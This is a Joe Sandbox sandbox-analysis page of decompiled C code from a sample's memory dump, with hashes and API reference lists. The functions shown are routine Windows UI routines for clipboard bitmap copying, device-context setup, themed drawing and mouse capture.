Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: ae99db0da73f7242fa49a9f3ad249d2deea47e1871dbf55894d7990eeb105832
Instruction ID: 00e31fd8c20a3f6707012749f3f1724d9c3c95398869f10caeb6d4471489dc12
Opcode Fuzzy Hash: ae99db0da73f7242fa49a9f3ad249d2deea47e1871dbf55894d7990eeb105832
Instruction Fuzzy Hash: B9513532904609DFCF14DFA9D884BEEB7B9BF48711F14806AE811BB251DB74AE44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00CDB0A1 Relevance: 12.1, APIs: 8, Instructions: 135
clipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CDB0A1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t58;
				struct HBRUSH__* _t60;
				intOrPtr* _t63;
				intOrPtr _t70;
				int _t73;
				void* _t103;
				struct HDC__* _t105;
				void* _t107;
				intOrPtr* _t108;
				void* _t109;
				void* _t115;

				_t115 = __fp0;
				_t109 = __eflags;
				_t101 = __edx;
				_t84 = __ebx;
				E00DDD5CB(0xe0a6f1, __ebx, __edi, __esi);
				_t103 = __ecx;
				_t105 = 0;
				 *((intOrPtr*)(_t107 - 4)) = 0;
				E00CB90E5(__ebx, _t107 - 0x54, __edx, __ecx, 0, _t109, 0, 0x54);
				 *((char*)(_t107 - 4)) = 1;
				E00CB9032(_t107 - 0x3c);
				 *((char*)(_t107 - 4)) = 2;
				E00CB9B84(_t84, _t107 - 0x3c, CreateCompatibleDC(0));
				 *((intOrPtr*)(_t107 - 0x28)) = 0;
				 *((intOrPtr*)(_t107 - 0x2c)) = 0xe196b4;
				 *((char*)(_t107 - 4)) = 3;
				if(E00CB9BC6(_t84, _t107 - 0x2c, _t103, CreateCompatibleBitmap( *(_t107 - 0x50),  *(_t103 + 0x54),  *(_t103 + 0x58))) == 0) {
					L6:
					_push(0xffffffff);
					_push(_t105);
					_push(0x3e8a);
					E00CADD79(_t84, _t101, _t103, _t105, _t113);
					 *((intOrPtr*)(_t107 - 0x2c)) = 0xe196b4;
					E00CB91F0(_t107 - 0x2c, _t101);
					E00CB91A4(_t107 - 0x3c);
					E00CB9360(_t107 - 0x54);
					L7:
					return E00DDD51D(_t84, _t103, _t105);
				}
				_t84 = E00CBA251( *(_t107 - 0x38),  *((intOrPtr*)(_t107 - 0x28)));
				_t58 = E00CC19ED();
				_t93 =  *(_t103 + 0x58);
				 *(_t107 - 0x24) = 0;
				 *((intOrPtr*)(_t107 - 0x20)) = 0;
				_t19 = _t58 + 0x98; // 0x98
				_t101 = _t19;
				 *(_t107 - 0x18) =  *(_t103 + 0x58);
				 *(_t107 - 0x1c) =  *(_t103 + 0x54);
				_t60 = 0;
				_t111 = _t101;
				if(_t101 != 0) {
					_t60 =  *(_t101 + 4);
				}
				FillRect( *(_t107 - 0x38), _t107 - 0x24, _t60);
				_t63 = _t108;
				 *_t63 = _t105;
				 *((intOrPtr*)(_t63 + 4)) = _t105;
				E00CDE9FE(_t84, _t103, _t101, _t103, _t105, _t111, _t107 - 0x60, _t93, _t93, _t105);
				_push(0xff);
				_push(_t105);
				_push(_t105);
				_push(_t105);
				_push(_t105);
				_push(_t105);
				_push( *((intOrPtr*)(_t107 + 8)));
				_push(_t105);
				_push(_t105);
				_push(_t107 - 0x3c);
				L00CDBFF1(_t84, _t103, _t103, _t105, _t111, _t115);
				_t96 = _t103;
				E00CDCBFB(_t84, _t103, _t103, _t105, _t107 - 0x60);
				_t70 = _t105;
				_t112 = _t84;
				if(_t84 != 0) {
					_t70 =  *((intOrPtr*)(_t84 + 4));
				}
				E00CBA251( *(_t107 - 0x38), _t70);
				_t73 = OpenClipboard( *(E00CAC659(_t96, _t105, _t112) + 0x20));
				_t113 = _t73;
				if(_t73 != 0) {
					__eflags = EmptyClipboard();
					if(__eflags != 0) {
						__eflags = SetClipboardData(2, E00CB9D20(_t84, _t107 - 0x2c));
						if(__eflags == 0) {
							_push(0xffffffff);
							_push(_t105);
							_push(0x3e8a);
							E00CADD79(_t84, _t101, _t103, _t105, __eflags);
						}
						_t105 = 1;
						__eflags = 1;
						L13:
						CloseClipboard();
						 *((intOrPtr*)(_t107 - 0x2c)) = 0xe196b4;
						E00CB91F0(_t107 - 0x2c, _t101);
						E00CB91A4(_t107 - 0x3c);
						E00CB9360(_t107 - 0x54);
						goto L7;
					}
					_push(0xffffffff);
					_push(_t105);
					_push(0x3e8a);
					E00CADD79(_t84, _t101, _t103, _t105, __eflags);
					goto L13;
				} else {
					goto L6;
				}
			}

0x00cdb0a1
0x00cdb0a1
0x00cdb0a1
0x00cdb0a1
0x00cdb0a8
0x00cdb0ad
0x00cdb0af
0x00cdb0b5
0x00cdb0b8
0x00cdb0c0
0x00cdb0c4
0x00cdb0ca
0x00cdb0d8
0x00cdb0dd
0x00cdb0e0
0x00cdb0ea
0x00cdb105
0x00cdb1aa
0x00cdb1aa
0x00cdb1ac
0x00cdb1ad
0x00cdb1b2
0x00cdb1ba
0x00cdb1c1
0x00cdb1c9
0x00cdb1d1
0x00cdb1d8
0x00cdb1dd
0x00cdb1dd
0x00cdb116
0x00cdb118
0x00cdb11d
0x00cdb120
0x00cdb123
0x00cdb126
0x00cdb126
0x00cdb12c
0x00cdb132
0x00cdb135
0x00cdb137
0x00cdb139
0x00cdb13b
0x00cdb13b
0x00cdb146
0x00cdb14f
0x00cdb153
0x00cdb155
0x00cdb15c
0x00cdb161
0x00cdb166
0x00cdb167
0x00cdb168
0x00cdb169
0x00cdb16a
0x00cdb16b
0x00cdb173
0x00cdb174
0x00cdb175
0x00cdb176
0x00cdb17e
0x00cdb181
0x00cdb186
0x00cdb188
0x00cdb18a
0x00cdb18c
0x00cdb18c
0x00cdb193
0x00cdb1a0
0x00cdb1a6
0x00cdb1a8
0x00cdb1e6
0x00cdb1e8
0x00cdb20a
0x00cdb20c
0x00cdb20e
0x00cdb210
0x00cdb211
0x00cdb216
0x00cdb216
0x00cdb21d
0x00cdb21d
0x00cdb21e
0x00cdb21e
0x00cdb227
0x00cdb22e
0x00cdb236
0x00cdb23e
0x00000000
0x00cdb243
0x00cdb1ea
0x00cdb1ec
0x00cdb1ed
0x00cdb1f2
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00CDB0A8

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

CreateCompatibleDC.GDI32(00000000), ref: 00CDB0CE
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CDB0F4

Part of subcall function 00CBA251: SelectObject.GDI32(0000005C,?), ref: 00CBA25A

FillRect.USER32 ref: 00CDB146
OpenClipboard.USER32(?), ref: 00CDB1A0
EmptyClipboard.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CDB1E0
SetClipboardData.USER32(00000002,00000000), ref: 00CDB204
CloseClipboard.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CDB21E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
String ID:
API String ID: 2940850299-0
Opcode ID: 66030618f5897dafaa3c3fa9b112531519870bedee306da04f94a49f038b6836
Instruction ID: 3bc0a49eac017dde74353681d593be3410317cfdc914d71e47415b1655e86bcf
Opcode Fuzzy Hash: 66030618f5897dafaa3c3fa9b112531519870bedee306da04f94a49f038b6836
Instruction Fuzzy Hash: D4416271904219EFCF04EFE5DC5A9DDBBB9EF19710F00811AF516B62A1DB309A04DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDE9FE Relevance: 12.1, APIs: 8, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CDE9FE(struct HDC__* __ebx, struct HDC__* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void** _a8, struct HDC__* _a12, struct HDC__* _a16) {
				struct HDC__* _v0;
				void* _v4;
				signed int _v16;
				struct HDC__* _v32;
				char _v36;
				void* _t47;
				struct HDC__* _t48;
				struct HDC__* _t51;
				void* _t52;
				struct HDC__* _t53;
				struct HBITMAP__* _t62;
				struct HDC__* _t64;
				void* _t71;
				void* _t72;
				void** _t75;
				struct HDC__** _t76;
				struct HDC__* _t77;
				struct HDC__* _t78;
				void* _t86;
				struct HDC__* _t87;
				void* _t89;
				struct HDC__* _t91;
				void* _t106;

				_t86 = __edx;
				_t77 = __ecx;
				_t74 = __ebx;
				_push(0x18);
				E00DDD52C(0xe0a9fc, __ebx, __edi, __esi);
				_t91 = __ecx;
				_t47 =  *(__ecx + 0x8c);
				if(_t47 == 0) {
					L12:
					_t48 = 0;
					goto L13;
				} else {
					if( *0xe872e0 != 0) {
						EnterCriticalSection(0xe872f8);
						_t47 =  *(_t91 + 0x8c);
					}
					_t89 = 0;
					 *((intOrPtr*)(_t91 + 0x20)) = 0;
					if(_t47 == 0) {
						L31:
						E00CAA4E7(_t74, _t77, _t89, _t91, __eflags);
						asm("int3");
						_t51 = _v0;
						_t87 = 0;
						__eflags = 0;
						while(1) {
							_t44 = _t51;
							_t51 = _t77->i;
							 *_t77 = _t44;
							__eflags = _t51;
							if(_t51 == 0) {
								break;
							}
							_t87 =  &(_t87->i);
							_t77 = _t77 + 4;
							__eflags = _t87 - 4;
							if(_t87 < 4) {
								continue;
							} else {
								_t51 = DeleteDC(_t51);
							}
							break;
						}
						return _t51;
					} else {
						_t77 = _t91 + 0x44;
						if(_t77 == 0 ||  *(_t77 + 4) == 0) {
							_t77 = _t91 + 0x9c;
							if(_t77 == 0 ||  *(_t77 + 4) == _t89) {
								if( *(_t91 + 0xa4) != _t89) {
									goto L31;
								} else {
									_t52 = SelectObject( *0xe87310, _t47);
									_t75 = _a8;
									_t75[2] = _t52;
									if(_t52 != 0) {
										__eflags =  *((intOrPtr*)(_t91 + 0x40)) - _t89;
										if( *((intOrPtr*)(_t91 + 0x40)) == _t89) {
											L18:
											_t53 = _a12;
											__eflags = _t53;
											if(_t53 <= 0) {
												L20:
												_t53 =  *(_t91 + 0x54);
												_t78 =  *(_t91 + 0x58);
											} else {
												_t78 = _a16;
												__eflags = _t78;
												if(_t78 <= 0) {
													goto L20;
												}
											}
											__eflags =  *((intOrPtr*)(_t91 + 8)) - 0x20;
											_t76 = _t91 + 0x64;
											_t76[1] = _t78;
											 *_t76 = _t53;
											if( *((intOrPtr*)(_t91 + 8)) != 0x20) {
												_v16 =  *((intOrPtr*)(_t91 + 0xa8));
											} else {
												_v16 = _v16 | 0xffffffff;
											}
											__eflags = E00CBDF4E(_t76,  *(_t91 + 0x54),  *(_t91 + 0x58));
											if(__eflags != 0) {
												L26:
												_push(_t89);
												E00CB90E5(_t76,  &_v36, _t86, _t89, _t91, __eflags);
												_v4 = _t89;
												 *((intOrPtr*)(_t91 + 0x20)) = E00CBDF4E(_t76,  *(_t91 + 0x54),  *(_t91 + 0x58));
												E00CB9B84(_t76, _t91 + 0x44, CreateCompatibleDC(_t89));
												_t62 = CreateCompatibleBitmap(_v32,  &( *(_t91 + 0x54)->i),  &( *(_t91 + 0x58)->i));
												_t74 = _t91 + 0x9c;
												_t77 = _t74;
												E00CB9BC6(_t74, _t77, _t89, _t62);
												__eflags = _t74;
												if(_t74 != 0) {
													_t89 =  *(_t74 + 4);
												}
												_t64 = E00CBA251( *((intOrPtr*)(_t91 + 0x48)), _t89);
												 *(_t91 + 0xa4) = _t64;
												__eflags = _t64;
												if(__eflags == 0) {
													goto L31;
												} else {
													E00CB9360( &_v36);
													goto L30;
												}
											} else {
												__eflags = _v16 - 0xffffffff;
												if(__eflags == 0) {
													L30:
													_t48 = 1;
													L13:
													return E00DDD4FA(_t48);
												} else {
													goto L26;
												}
											}
										} else {
											_t71 = CreateBitmap( &( *(_t91 + 0x54)->i),  &( *(_t91 + 0x58)->i), 1, 1, _t89);
											 *_t75 = _t71;
											_t72 = SelectObject( *0xe87314, _t71);
											_t75[1] = _t72;
											__eflags =  *_t75 - _t89;
											if( *_t75 == _t89) {
												L17:
												E00CB83BD(_t89, _t75);
												goto L10;
											} else {
												__eflags = _t72;
												if(_t72 != 0) {
													goto L18;
												} else {
													goto L17;
												}
											}
										}
									} else {
										L10:
										_t106 =  *0xe872e0 - _t89; // 0x0
										if(_t106 != 0) {
											LeaveCriticalSection(0xe872f8);
										}
										goto L12;
									}
								}
							} else {
								goto L31;
							}
						} else {
							goto L31;
						}
					}
				}
			}

0x00cde9fe
0x00cde9fe
0x00cde9fe
0x00cde9fe
0x00cdea05
0x00cdea0a
0x00cdea0c
0x00cdea14
0x00cdea9a
0x00cdea9a
0x00000000
0x00cdea1a
0x00cdea21
0x00cdea28
0x00cdea2e
0x00cdea2e
0x00cdea34
0x00cdea36
0x00cdea3b
0x00cdeba7
0x00cdeba7
0x00cdebac
0x00cdebb0
0x00cdebb3
0x00cdebb3
0x00cdebb5
0x00cdebb5
0x00cdebb5
0x00cdebb5
0x00cdebb7
0x00cdebb9
0x00000000
0x00000000
0x00cdebbb
0x00cdebbc
0x00cdebbf
0x00cdebc2
0x00000000
0x00cdebc4
0x00cdebc5
0x00cdebc5
0x00000000
0x00cdebc2
0x00cdebcc
0x00cdea41
0x00cdea41
0x00cdea46
0x00cdea51
0x00cdea59
0x00cdea6a
0x00000000
0x00cdea70
0x00cdea77
0x00cdea7d
0x00cdea80
0x00cdea85
0x00cdeaa4
0x00cdeaa7
0x00cdeae4
0x00cdeae4
0x00cdeae7
0x00cdeae9
0x00cdeaf2
0x00cdeaf2
0x00cdeaf5
0x00cdeaeb
0x00cdeaeb
0x00cdeaee
0x00cdeaf0
0x00000000
0x00000000
0x00cdeaf0
0x00cdeaf8
0x00cdeafc
0x00cdeaff
0x00cdeb02
0x00cdeb04
0x00cdeb12
0x00cdeb06
0x00cdeb06
0x00cdeb06
0x00cdeb22
0x00cdeb24
0x00cdeb2c
0x00cdeb2c
0x00cdeb30
0x00cdeb3a
0x00cdeb46
0x00cdeb53
0x00cdeb69
0x00cdeb6f
0x00cdeb76
0x00cdeb78
0x00cdeb7d
0x00cdeb7f
0x00cdeb81
0x00cdeb81
0x00cdeb88
0x00cdeb8d
0x00cdeb93
0x00cdeb95
0x00000000
0x00cdeb97
0x00cdeb9a
0x00000000
0x00cdeb9a
0x00cdeb26
0x00cdeb26
0x00cdeb2a
0x00cdeb9f
0x00cdeba1
0x00cdea9c
0x00cdeaa1
0x00000000
0x00000000
0x00000000
0x00cdeb2a
0x00cdeaa9
0x00cdeabc
0x00cdeac9
0x00cdeacb
0x00cdead1
0x00cdead4
0x00cdead6
0x00cdeadc
0x00cdeadd
0x00000000
0x00cdead8
0x00cdead8
0x00cdeada
0x00000000
0x00000000
0x00000000
0x00000000
0x00cdeada
0x00cdead6
0x00cdea87
0x00cdea87
0x00cdea87
0x00cdea8d
0x00cdea94
0x00cdea94
0x00000000
0x00cdea8d
0x00cdea85
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00cdea46
0x00cdea3b

APIs

__EH_prolog3.LIBCMT ref: 00CDEA05
EnterCriticalSection.KERNEL32(00E872F8,00000018,00CC5E46,?,00000000,00000000,00000000), ref: 00CDEA28
SelectObject.GDI32(?,00000018), ref: 00CDEA77
LeaveCriticalSection.KERNEL32(00E872F8,?), ref: 00CDEA94
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00CDEABC
SelectObject.GDI32(00000000), ref: 00CDEACB
CreateCompatibleDC.GDI32(00000000), ref: 00CDEB49
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CDEB69

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
String ID:
API String ID: 4255533662-0
Opcode ID: 753e61d797c345db991a911c70954491b19c8a1738fb1a58491df5918d95c9a4
Instruction ID: 78759eb5cd51ae7da616e1127e27ce1639b09838462960e497d649b4ad4dc327
Opcode Fuzzy Hash: 753e61d797c345db991a911c70954491b19c8a1738fb1a58491df5918d95c9a4
Instruction Fuzzy Hash: 62514070600702DFDB30EF65CC85AA6BBF4FF44714B14452EE5AA9A361D770E944DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CE9729 Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00CE9729(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t47;
				struct HBRUSH__* _t48;
				long _t57;
				void* _t59;
				intOrPtr _t73;
				struct HDC__* _t74;
				struct HDC__* _t78;
				intOrPtr* _t79;
				intOrPtr _t86;
				intOrPtr _t96;
				intOrPtr _t101;
				intOrPtr _t107;
				void* _t108;

				_push(0x28);
				E00DDD55F(0xe0b002, __ebx, __edi, __esi);
				_t96 = __ecx;
				 *((intOrPtr*)(_t108 - 0x28)) = __ecx;
				_t101 =  *((intOrPtr*)(_t108 + 8));
				 *((intOrPtr*)(_t108 - 0x2c)) = _t101;
				 *((intOrPtr*)(_t108 - 0x34)) =  *((intOrPtr*)(_t108 + 0xc));
				_t78 = 0;
				 *((intOrPtr*)(_t108 - 4)) = 0;
				_t47 = GetSysColor(0x17);
				 *(_t108 - 0x30) = _t47;
				 *(_t108 - 0x24) = _t47;
				if( *((intOrPtr*)(_t96 + 0x44)) == 0) {
					_t48 = GetSysColorBrush(0x18);
					__eflags = _t101;
					if(__eflags != 0) {
						_t78 =  *(_t101 + 4);
					}
					FillRect(_t78, _t108 + 0x10, _t48);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect(_t108 - 0x20, 2, 2);
					_t73 =  *((intOrPtr*)(_t108 - 0x2c));
					_t111 = _t73;
					if(_t73 != 0) {
						_t74 =  *((intOrPtr*)(_t73 + 4));
					} else {
						_t74 = 0;
					}
					_t107 =  *((intOrPtr*)(_t108 - 0x28));
					__imp__DrawThemeBackground( *((intOrPtr*)(_t107 + 0x44)), _t74, 1, _t78, _t108 - 0x20, _t78);
					__imp__GetThemeColor( *((intOrPtr*)(_t107 + 0x44)), 1, _t78, 0xedb, _t108 - 0x30);
					__imp__GetThemeColor( *((intOrPtr*)(_t107 + 0x44)), 1, _t78, 0xedc, _t108 - 0x24);
				}
				E00CC58DD(_t108 + 0x20, _t111);
				_t79 =  *((intOrPtr*)(_t108 - 0x2c));
				 *((intOrPtr*)(_t108 - 0x28)) =  *((intOrPtr*)( *_t79 + 0x30));
				 *0xe17a64();
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t108 - 0x34)))) + 0xdc))))() == 0) {
					_t57 =  *(_t108 - 0x30);
				} else {
					_t57 =  *(E00CC19ED() + 0x38);
				}
				 *0xe17a64(_t57);
				_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t108 - 0x28))))();
				_t86 =  *((intOrPtr*)(_t108 + 0x20));
				 *0xe17a64(_t86,  *((intOrPtr*)(_t86 - 0xc)), _t108 + 0x10, 0x25);
				 *((intOrPtr*)( *_t79 + 0x68))();
				 *0xe17a64(_t59);
				 *((intOrPtr*)( *((intOrPtr*)( *_t79 + 0x30))))();
				E00CA2975(E00CC0750(_t108 + 0x10,  *(_t108 - 0x24),  *(_t108 - 0x24)),  *((intOrPtr*)(_t108 + 0x20)) - 0x10);
				return E00DDD50E(_t79, _t59,  *((intOrPtr*)( *_t79 + 0x30)));
			}

0x00ce9729
0x00ce9730
0x00ce9735
0x00ce9737
0x00ce973a
0x00ce9740
0x00ce9743
0x00ce9746
0x00ce974a
0x00ce974d
0x00ce9753
0x00ce9756
0x00ce975c
0x00ce97c7
0x00ce97cd
0x00ce97cf
0x00ce97d1
0x00ce97d1
0x00ce97da
0x00ce975e
0x00ce9764
0x00ce976d
0x00ce976e
0x00ce976f
0x00ce9770
0x00ce9776
0x00ce9779
0x00ce977b
0x00ce9781
0x00ce977d
0x00ce977d
0x00ce977d
0x00ce9784
0x00ce9793
0x00ce97a8
0x00ce97bd
0x00ce97bd
0x00ce97e3
0x00ce97e8
0x00ce97f3
0x00ce9800
0x00ce980c
0x00ce9818
0x00ce980e
0x00ce9813
0x00ce9813
0x00ce9821
0x00ce9829
0x00ce982b
0x00ce983f
0x00ce9847
0x00ce9852
0x00ce985a
0x00ce9873
0x00ce987d

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE9730
GetSysColor.USER32(00000017), ref: 00CE974D
InflateRect.USER32(?,00000002,00000002), ref: 00CE9770
DrawThemeBackground.UXTHEME(?,?,00000001,00000000,?,00000000), ref: 00CE9793
GetThemeColor.UXTHEME(?,00000001,00000000,00000EDB,?), ref: 00CE97A8
GetThemeColor.UXTHEME(?,00000001,00000000,00000EDC,?), ref: 00CE97BD
GetSysColorBrush.USER32(00000018), ref: 00CE97C7
FillRect.USER32 ref: 00CE97DA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Color$Theme$Rect$BackgroundBrushDrawFillH_prolog3_Inflate
String ID:
API String ID: 229325109-0
Opcode ID: 3425701d3860d2be4e141da030e42d933aa35f8bf1b789e07a877ada6eacaf71
Instruction ID: 9c2a84e20e989501cf2670e157149b666e6094b1f46e8c37e8e1cd1fab3a6eea
Opcode Fuzzy Hash: 3425701d3860d2be4e141da030e42d933aa35f8bf1b789e07a877ada6eacaf71
Instruction Fuzzy Hash: B7410675A00259AFDF00DFA5C889AAE77BAFF48700F054459F916B7250CA30AD04CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CC66DF Relevance: 12.1, APIs: 8, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00CC66DF(void* __ecx, void* __edi, signed int _a4, struct tagPOINT _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagPOINT _v32;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t46;
				intOrPtr _t62;
				signed int _t70;
				void* _t76;
				void* _t77;
				signed int _t78;
				void* _t80;
				signed int _t81;
				intOrPtr _t84;

				_t77 = __edi;
				_t46 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t46 ^ _t81;
				_t80 = __ecx;
				 *((intOrPtr*)(__ecx + 0xbc)) = 0;
				_t70 = _a4 & 0x00000001;
				if(_t70 != 0 ||  *((intOrPtr*)(__ecx + 0x80)) != 0) {
					L4:
					_push(_t77);
					_t78 = 0;
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetClientRect( *(_t80 + 0x20),  &_v24);
					_t72 = _a12;
					_v32.x = _a8.x;
					_v32.y = _a12;
					ClientToScreen( *(_t80 + 0x20),  &_v32);
					_push(_a12);
					if(PtInRect( &_v24, _a8) == 0) {
						L20:
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags =  *(_t80 + 0xb4) - _t78;
							if( *(_t80 + 0xb4) == _t78) {
								L26:
								__eflags =  *(_t80 + 0xb8);
								if(__eflags == 0) {
									L16:
									_t95 = _t78;
									if(_t78 == 0) {
										L18:
										_pop(_t77);
										goto L19;
									}
									L17:
									InvalidateRect( *(_t80 + 0x20), 0, 1);
									UpdateWindow( *(_t80 + 0x20));
									goto L18;
								}
								__eflags = _t70;
								if(__eflags != 0) {
									goto L16;
								}
								ReleaseCapture();
								 *(_t80 + 0xb8) =  *(_t80 + 0xb8) & _t70;
								goto L17;
							}
							_t41 = _t80 + 0xb4;
							 *_t41 =  *(_t80 + 0xb4) & _t78;
							__eflags =  *_t41;
							L25:
							_t78 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags =  *(_t80 + 0xac) - _t78;
						if( *(_t80 + 0xac) == _t78) {
							goto L26;
						}
						 *(_t80 + 0xac) =  *(_t80 + 0xac) & _t78;
						goto L25;
					}
					_push(_v32.y);
					_t62 = E00CB277F(_t70, _t72, _t76, WindowFromPoint(_v32));
					if(_t62 != 0) {
						_t62 =  *((intOrPtr*)(_t62 + 0x20));
					}
					if(_t62 !=  *(_t80 + 0x20)) {
						goto L20;
					} else {
						 *((intOrPtr*)(_t80 + 0xbc)) = 1;
						if( *(_t80 + 0xb4) == _t78) {
							 *(_t80 + 0xb4) = 1;
							_t78 = 1;
						}
						if(_t70 != 0 &&  *(_t80 + 0xac) == 0 &&  *((intOrPtr*)(_t80 + 0xb0)) != 0) {
							 *(_t80 + 0xac) = 1;
							_t78 = 1;
						}
						if( *(_t80 + 0xb8) == 0) {
							E00CB277F(_t70, _t72, _t76, SetCapture( *(_t80 + 0x20)));
							 *(_t80 + 0xb8) = 1;
							_t78 = 1;
						}
						goto L16;
					}
				} else {
					_t84 =  *0xe870ac; // 0x0
					if(_t84 == 0 ||  *((intOrPtr*)(__ecx + 0xa4)) != 0) {
						L19:
						return E00DDCBCE(E00CB236A(_t70, _t80, _t95), _t70, _v8 ^ _t81, _t76, _t77, _t80);
					} else {
						goto L4;
					}
				}
			}

0x00cc66df
0x00cc66e5
0x00cc66ec
0x00cc66f6
0x00cc66f8
0x00cc66fe
0x00cc6701
0x00cc6723
0x00cc6723
0x00cc6724
0x00cc6726
0x00cc6729
0x00cc672c
0x00cc672f
0x00cc6739
0x00cc6742
0x00cc6745
0x00cc674f
0x00cc6752
0x00cc6758
0x00cc676a
0x00cc681e
0x00cc681e
0x00cc6820
0x00cc6832
0x00cc6838
0x00cc6843
0x00cc6843
0x00cc684a
0x00cc67ec
0x00cc67ec
0x00cc67ee
0x00cc6806
0x00cc6806
0x00000000
0x00cc6806
0x00cc67f0
0x00cc67f7
0x00cc6800
0x00000000
0x00cc6800
0x00cc684c
0x00cc684e
0x00000000
0x00000000
0x00cc6850
0x00cc6856
0x00000000
0x00cc6856
0x00cc683a
0x00cc683a
0x00cc683a
0x00cc6840
0x00cc6842
0x00cc6842
0x00000000
0x00cc6842
0x00cc6822
0x00cc6828
0x00000000
0x00000000
0x00cc682a
0x00000000
0x00cc682a
0x00cc6770
0x00cc677d
0x00cc6784
0x00cc6786
0x00cc6786
0x00cc678c
0x00000000
0x00cc6792
0x00cc6795
0x00cc67a1
0x00cc67a3
0x00cc67a9
0x00cc67a9
0x00cc67ad
0x00cc67c1
0x00cc67c7
0x00cc67c7
0x00cc67d0
0x00cc67dc
0x00cc67e4
0x00cc67ea
0x00cc67ea
0x00000000
0x00cc67d0
0x00cc670b
0x00cc670b
0x00cc6711
0x00cc6807
0x00cc681b
0x00000000
0x00000000
0x00000000
0x00cc6711

APIs

